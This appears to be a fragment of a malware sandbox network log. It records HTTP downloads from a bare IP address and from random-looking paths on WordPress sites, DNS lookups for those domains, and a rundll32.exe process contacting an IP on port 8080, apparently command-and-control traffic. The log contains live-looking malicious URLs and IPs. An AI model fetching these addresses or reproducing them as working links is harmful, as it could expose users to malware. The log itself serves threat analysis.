Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
716 B 11.7kB 8 10
HTTP Request
GET http://92.255.57.195/sec/se1.htmlHTTP Response
200 -
678 B 3.0kB 13 5
HTTP Request
GET http://92.255.57.195/sec/se1.pngHTTP Response
200 -
643 B 1.8kB 12 5
HTTP Request
GET http://seven-lines.com/wp-includes/QEGNF4XUSR2Ps/HTTP Response
404 -
9.8kB 591.0kB 211 414
HTTP Request
GET http://quranthemepark.com/wp-content/OaIz2gBtm/HTTP Response
200 -
152 B 120 B 3 3
-
152 B 120 B 3 3
-
69.16.218.101:8080https://69.16.218.101:8080/LHyFjvUSshgKZWdsKtuzciSGqqTgxPjUzJDwjkNtls, httprundll32.exe1.2kB 3.0kB 8 9
HTTP Request
GET https://69.16.218.101:8080/LHyFjvUSshgKZWdsKtuzciSGqqTgxPjUzJDwjkNHTTP Response
200
-
122 B 154 B 2 2
DNS Request
seven-lines.com
DNS Request
seven-lines.com
DNS Response
178.208.83.22
DNS Response
178.208.83.22
-
64 B 96 B 1 1
DNS Request
quranthemepark.com
DNS Response
104.21.59.15172.67.167.147